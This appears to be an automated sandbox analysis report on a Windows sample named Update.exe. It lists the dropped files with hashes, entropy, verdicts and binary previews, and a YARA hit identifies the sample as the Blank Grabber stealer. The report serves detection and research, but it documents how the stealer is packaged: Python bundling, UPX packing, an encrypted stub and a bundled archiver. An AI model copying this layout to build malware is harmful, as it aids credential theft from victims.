                                                            SHA-256:E168A1E229F57248253EAD19F60802B25DC0DBC717C9776E157B8878D2CA4F3D
                                                            SHA-512:154FD26D4CA1E6A85E3B84CE9794A9D1EF6957C3BBA280D666686A0F14AA571AAEC20BAA0E869A78D4669F1F28EA333C0E9E4D3ECD51B25D34E46A0EF74EE735
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V/\.8|\.8|\.8|U..|Z.8|..9}^.8|:..|].8|..=}P.8|..<}T.8|..;}_.8|..9}Y.8|..9}^.8|\.9|..8|..5}U.8|..8}].8|...|].8|..:}].8|Rich\.8|................PE..d...#.,d.........." .............@.......P................................................`.............................................P.......4............`..D...........(...........................................8...........................................UPX0.....@..............................UPX1.........P......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pyd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):63768
                                                            Entropy (8bit):7.844124998607476
                                                            Encrypted:false
                                                            SSDEEP:1536:cww8TGrTNdinN5kuAQZMXb4zdILC74+67SykPx1:FPTGrTmN5kHQZMXc5ILC74Tax1
                                                            MD5:9A7AB96204E505C760921B98E259A572
                                                            SHA1:39226C222D3C439A03EAC8F72B527A7704124A87
                                                            SHA-256:CAE09BBBB12AA339FD9226698E7C7F003A26A95390C7DC3A2D71A1E540508644
                                                            SHA-512:0F5F58FB47379B829EE70C631B3E107CDE6A69DC64E4C993FB281F2D5ADA926405CE29EA8B1F4F87ED14610E18133932C7273A1AA209A0394CC6332F2ABA7E58
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ......................................................................`.........................................p...d....................P..........................................................8...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                            Category:dropped
                                                            Size (bytes):880569
                                                            Entropy (8bit):5.682988287908638
                                                            Encrypted:false
                                                            SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMNE:lgYJiVBFLa2VIVwx/fpEWe+MNE
                                                            MD5:483D9675EF53A13327E7DFC7D09F23FE
                                                            SHA1:2378F1DB6292CD8DC4AD95763A42AD49AEB11337
                                                            SHA-256:70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
                                                            SHA-512:F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
                                                            Malicious:false
                                                            Preview:PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                            Category:dropped
                                                            Size (bytes):76642
                                                            Entropy (8bit):7.8704024460609965
                                                            Encrypted:false
                                                            SSDEEP:1536:3zgkBXtccZn2JSfpamoqHw3pT4N/MImw2AX6IqSRYCet5e8:3zguqcZhc/3lPIFb6IqSRC5e8
                                                            MD5:C79FACF1F3E2AB2A94E4F0916C73C061
                                                            SHA1:3D939EB8324615044299F7BEC38BE9387F64EAE6
                                                            SHA-256:68DB606F37D86E2E153FB845D0B989C8433649885A25C718947814F79BC63553
                                                            SHA-512:C6A1F1EEED9D968C1C9225CBDD5317418A13B4436594F7865D972EAD1A0AA9F4FF4F2D31EA104CB51FA9CA30AF2563C97F24168C2474C4A8F02A002240349B09
                                                            Malicious:false
                                                            Preview:PK........P.'Y...y.*...*......stub-o.pyco.......I..f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2322447
                                                            Entropy (8bit):7.993315504665587
                                                            Encrypted:true
                                                            SSDEEP:49152:n02Qkp0yPD8wHfB+bsqaX1s5tK+9yePD+qnRLZJZ2zjg8fkVhE:02QkpDbPHv1o7yVqRPc367E
                                                            MD5:7A025B37DCB4EFDEB325AB731BD8C498
                                                            SHA1:78846B08DA0FFBA0322D06ED96FE6BFE205509AC
                                                            SHA-256:5A2A50A2B6E0DC24259516FEB6F61B6ECEC1A4E1C75E9A8478CB7CB3C28336C7
                                                            SHA-512:3199FADC1503747F76DF1C77B04B019DD9CFC3679975AFC1203A05759D4B172D6C8D69A0A215ABBFB1F256C461085BA7BB55518E964F6C5166254917FE69D338
                                                            Malicious:false
                                                            Preview:.....=..}8g.x....X.x.......?..}.(.y{w#.L......B....n.+....D.5...F..0t.[..X...!..d?.)H.F..,...`iT.2s$...7...fsr..H.C.Ej)..L.2.xp...V(y..J.R.V.U.B.B.Z.........87~A(.Q..0..b8...!#..Bq....6.H.'.8xD^R.+rD....2...B.G....G...<.G..ar.5n*...^L"...U.T*a..ypc...q......'...S%G$..TG.21....V1.<Zg.tXE.h..U.....p.......p...%*.i.....P..b....t.~..V....xl..=....[..Z..#..I)..u2e.r!.?H....!.!.DZ.....deJ!...QjG8pb...*.B.....&.^W...JVU.(..|..$.2D....U.3!Ir...+..R"..Y\.. J.5.M..QQL@P..bT.6..."..I*D...L.......E7!YR....(...r..U.}.{.h.|..Cze.`..A....Q..p.. ..;a..@4!..t...B.?......{K...=.P.._..(d.!+..B..?.`.I.....<x......,.E..b....<.....F??e...A.b..?.'.*578&..);.L.,.....J.=.3.F]<S.B!....Y].U./........h.O9.1.#&.q,P.."qq>0_J.L.K..0RNVc.m.6.[.....}|.....E.......Vg.)..p.....d..F'.8....&g.....\...O...*....%.%8..Zk.d..Og`..iRY...E%....1.F2..y...qu./...........^.S36../V.)rJ....7.+...,....~..^v.A...%.|.s2.....g.....@...H.=.'...O.vN...9%.Gb...g......8....R=.;'|.<...{.....7.v

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\libcrypto-1_1.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1112856
                                                            Entropy (8bit):7.937513332106868
                                                            Encrypted:false
                                                            SSDEEP:24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
                                                            MD5:BBC1FCB5792F226C82E3E958948CB3C3
                                                            SHA1:4D25857BCF0651D90725D4FB8DB03CCADA6540C3
                                                            SHA-256:9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
                                                            SHA-512:3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\libffi-7.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):24088
                                                            Entropy (8bit):7.527291720504194
                                                            Encrypted:false
                                                            SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                            MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                            SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                            SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                            SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\libssl-1_1.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):209688
                                                            Entropy (8bit):7.925861479415686
                                                            Encrypted:false
                                                            SSDEEP:3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
                                                            MD5:AD0A2B4286A43A0EF05F452667E656DB
                                                            SHA1:A8835CA75768B5756AA2445CA33B16E18CEACB77
                                                            SHA-256:2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
                                                            SHA-512:CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1514776
                                                            Entropy (8bit):7.99244120733247
                                                            Encrypted:true
                                                            SSDEEP:24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
                                                            MD5:4A6AFA2200B1918C413D511C5A3C041C
                                                            SHA1:39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
                                                            SHA-256:BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
                                                            SHA-512:DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):630736
                                                            Entropy (8bit):6.409476333013752
                                                            Encrypted:false
                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):4.447296373872587
                                                            Encrypted:false
                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key, Author: Joe Security
                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\select.pyd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):26392
                                                            Entropy (8bit):7.406438297877472
                                                            Encrypted:false
                                                            SSDEEP:384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
                                                            MD5:B6DE7C98E66BDE6ECFFBF0A1397A6B90
                                                            SHA1:63823EF106E8FD9EA69AF01D8FE474230596C882
                                                            SHA-256:84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
                                                            SHA-512:1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\sqlite3.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):637208
                                                            Entropy (8bit):7.9938769843425055
                                                            Encrypted:true
                                                            SSDEEP:12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
                                                            MD5:0C4996047B6EFDA770B03F8F231E39B8
                                                            SHA1:DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
                                                            SHA-256:983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
                                                            SHA-512:112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.v....@...@...@...@...@I..A...@I..A...@I..A...@I..A...@P..A...@...@...@..A...@..A...@..@...@..A...@Rich...@........PE..d.....,d.........." .....`...0.......Z....................................................`..........................................{..."...x.......p.......0..L....................................................f..8...........................................UPX0....................................UPX1.....`.......X..................@....rsrc....0...p.......\..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pyd

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Update.exe
                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):296728
                                                            Entropy (8bit):7.985011478309557
                                                            Encrypted:false
                                                            SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                            MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                            SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                            SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                            SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_025xchzj.1yp.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hlrlury.aob.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fuprbfx.s1n.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ri3bsk2.dqt.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tocp5wi.spm.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20ysg5xx.exv.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34w2frg5.sp2.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
